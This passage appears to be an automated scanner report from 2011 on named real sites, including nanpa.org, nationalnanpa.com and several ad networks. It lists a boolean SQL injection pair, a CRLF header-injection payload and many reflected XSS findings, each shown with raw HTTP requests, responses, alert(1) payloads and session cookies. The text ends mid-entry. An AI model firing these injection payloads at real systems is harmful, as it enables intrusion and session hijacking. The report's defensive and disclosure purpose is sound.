POST /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas
Cache-Control: max-age=0
Origin: http://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000
Content-Length: 52

codeQueryModel.stateAbbr=AK13320976'%20or%201%3d1--%20&codeQueryModel.nasNpaId=

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:44 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18780


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</option>
<option value="442">442</option>
<option value="938">938</option>
<option value="458">458</option>
<option value="534">534</option>
<option value="929">929</option>
<option value="952">952</option>
<option value="956">956</option>
<option value="970">970</option>
<option value="972">972</option>
<option value="386">386</option>
<option value="380">380</option>
<option value="628">628</option>
<option value="951">951</option>
<option value="769">769</option>
<option value="684">684</option>
<option value="762">762</option>
<option value="424">424</option>
<option value="779">779</option>
<option value="575">575</option>
<option value="657">657</option>
<option value="681">681</option>
<option value="747">747</option>
<option value="872">872</option>
<option value="531">531</option>
<option value="327">327</option>
<option value="539">539</option>
<option value="201">201</option>
<option value="202">202</option>
<option value="203">203</option>
<option value="205">205</option>
<option value="206">206</option>
<option value="207">207</option>
<option value="208">208</option>
<option value="209">209</option>
<option value="210">210</option>
<option value="212">212</option>
<option value="213">213</option>
<option value="215">215</option>
<option value="217">217</option>
<option value="219">219</option>
<option value="225">225</option>
<option value="229">229</option>
<option value="234">234</option>
<option value="240">240</option>
<option value="252">252</option>
<option value="253">253</option>
<option value="256">256</option>
<option value="262">262</option>
<option value="269">269</option>
<option value="281">281</option>
<option value="301">301</option>
<option value="303">303</option>
<option value="305">305</option>
<option value="307">307</option>
<option value="309">309</option>
<option value="312">312</option>
<option value="314">314</option>
<option value="316">316</option>
<option value="318">318</
...[SNIP]...

Request 2

POST /nas/public/assigned_code_query_step1.do?method=selectNpas HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas
Cache-Control: max-age=0
Origin: http://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000
Content-Length: 52

codeQueryModel.stateAbbr=AK13320976'%20or%201%3d2--%20&codeQueryModel.nasNpaId=

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:45 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 8478


<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
</option></select>
</td>
</tr>

<tr>
<td colspan="2" align="center">
<br>
</td>
</tr>

<tr>
<td colspan="2" align="center">
<input type="submit" value="Continue">
<input type="reset" value="Reset">
</td>
</tr>
</table>

</form>


</td>
</tr>
<tr height="2%">
<td colspan="2" align="center">
<!-- Start Footer -->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="center" valign="middle" height="2" colspan="3" bgcolor="#cccccc"><img src="/nas/public/images/px_CCCCCC.gif" width="1" height="1"></td>
</tr>
<tr>
<td align="left" valign="middle" width="81"><a href="http://www.neustar.biz" target="_blank"><img src="/nas/public/images/neustar_logo.gif" width="81" height="19" border="0" alt="www.neustar.biz"></a></td>
<td align="center" valign="middle" width="464">
<span class="footer">&copy; 2010 NeuStar, Inc.</span>
<a class="footer" href="http://www.nanpa.com/content/legalNotice.html">Legal Notice/Disclaimer</a>.
</td>
<td align="right" valign="middle" width="200">
<p class="footer">Last updated:
<script language="JavaScript">
<!-- Begin
var months = new Array(13);
months[1] = "January";
months[2] = "February";
months[3] = "March";
months[4] = "April";
months[5] = "May";
months[6] = "June";
months[7] = "July";
months[8] = "August";
months[9] = "September";
months[10] = "October";
months[11] = "November";
months[12] = "December";
var dateObj = new Date(document.lastModified);
var lmonth = months[dateObj.getMonth() + 1];
var date = dateObj.getDate();
var fyear = dateObj.getYear();
if (fyear < 2000)
fyear += 1900;
document.write(lmonth + " " + date + ",
...[SNIP]...

2. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/connectedplanet.iclick.com/adtarget

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7cb05%0d%0a98d04ffcdd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /7cb05%0d%0a98d04ffcdd0/connectedplanet.iclick.com/adtarget;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=640x480;pos=introstitial;spon=;ord=63786.06336656958 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7cb05
98d04ffcdd0
/connectedplanet.iclick.com/adtarget;subss=;subs=news;area=bss_oss;site=connectedplanet;kw=;sz=640x480;pos=introstitial;spon=;ord=63786.06336656958:
Date: Thu, 12 May 2011 00:49:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)
There are 31 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ds.addthis.com/red/psi/sites/nanpa.org/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/nanpa.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c7cf3<script>alert(1)</script>85e81b10871 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/nanpa.org/p.json?callback=_ate.ad.hprc7cf3<script>alert(1)</script>85e81b10871&uid=4dab4fa85facd099&url=http%3A%2F%2Fnanpa.org%2Fabout_overview.php&ref=http%3A%2F%2Fnanpa.org%2F&1otax1h HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1305126976.1FE|1305126976.1OD|1305126976.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 00:04:23 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 00:04:23 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 00:04:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:04:23 GMT
Connection: close

_ate.ad.hprc7cf3<script>alert(1)</script>85e81b10871({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

3.2. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2985c"-alert(1)-"00cb3ba448f was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:37 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4747
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D69779922985c"-alert(1)-"00cb3ba448f");
mpck = "ht
...[SNIP]...

3.3. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a8d'%3balert(1)//6e9127e7ac0 was submitted in the mpck parameter. This input was echoed as 79a8d';alert(1)//6e9127e7ac0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D697799279a8d'%3balert(1)//6e9127e7ac0&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:39 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4753
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=697799279a8d';alert(1)//6e9127e7ac0" target="_blank">
...[SNIP]...

3.4. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8682"%3balert(1)//c72977f9130 was submitted in the mpvc parameter. This input was echoed as b8682";alert(1)//c72977f9130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3fb8682"%3balert(1)//c72977f9130 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:34 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?b8682";alert(1)//c72977f9130");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?b8682";
...[SNIP]...

3.5. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c994'%3balert(1)//62b09341242 was submitted in the mpvc parameter. This input was echoed as 4c994';alert(1)//62b09341242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f4c994'%3balert(1)//62b09341242 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:36 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4749
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?4c994';alert(1)//62b09341242http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992" target="_blank">
...[SNIP]...

3.6. http://nanpa.org/about_overview.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /about_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55190<script>alert(1)</script>17c6ad3db83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about_overview.php55190<script>alert(1)</script>17c6ad3db83 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:04:27 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/about_overview.php55190<script>alert(1)</script>17c6ad3db83</span>
...[SNIP]...

3.7. http://nanpa.org/awards_overview.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /awards_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88e0<script>alert(1)</script>66b1f6a06d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /awards_overview.phpd88e0<script>alert(1)</script>66b1f6a06d6 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/awards_overview.phpd88e0<script>alert(1)</script>66b1f6a06d6</span>
...[SNIP]...

3.8. http://nanpa.org/education_overview.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nanpa.org
Path:   /education_overview.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 593f4<script>alert(1)</script>c968a8dfd53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education_overview.php593f4<script>alert(1)</script>c968a8dfd53 HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:07 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/education_overview.php593f4<script>alert(1)</script>c968a8dfd53</span>
...[SNIP]...

3.9. http://nanpa.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
